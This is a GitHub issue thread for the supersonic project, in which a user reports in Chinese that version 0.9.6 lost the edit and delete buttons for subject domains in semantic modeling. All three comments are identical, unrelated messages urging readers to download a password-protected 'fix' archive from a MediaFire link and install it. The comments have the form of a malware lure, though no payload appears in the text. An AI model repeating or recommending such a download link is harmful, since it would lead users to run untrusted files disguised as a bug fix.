### ISSUE TITLE
[Bug] 【语义建模】左侧创建的主题域无编辑和删除按钮功能

### ISSUE THREAD

**Issue by antClimb** [tencentmusic/supersonic#1606]
### Search before asking

- [X] I had searched in the [issues](https://github.com/tencentmusic/supersonic/issues?q=is%3Aissue) and found no similar issues.

### Version

v0.9.6

### What's Wrong?

在v0.9.4的版本上功能正常，但v0.9.6版本则无主题域编辑和删除按钮操作。<img width="990" alt="2024-08-26_181800" src="https://github.com/user-attachments/assets/cbc4b1f8-5914-4e78-9fc8-046c1ed491e4">

### What You Expected?

语义 建模中能对主题域正常的编辑和删除操作。

### Are you willing to submit PR?

- [ ] Yes I am willing to submit a PR!

### Code of Conduct

- [X] I agree to follow this project's [Code of Conduct](https://www.apache.org/foundation/policies/conduct)

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
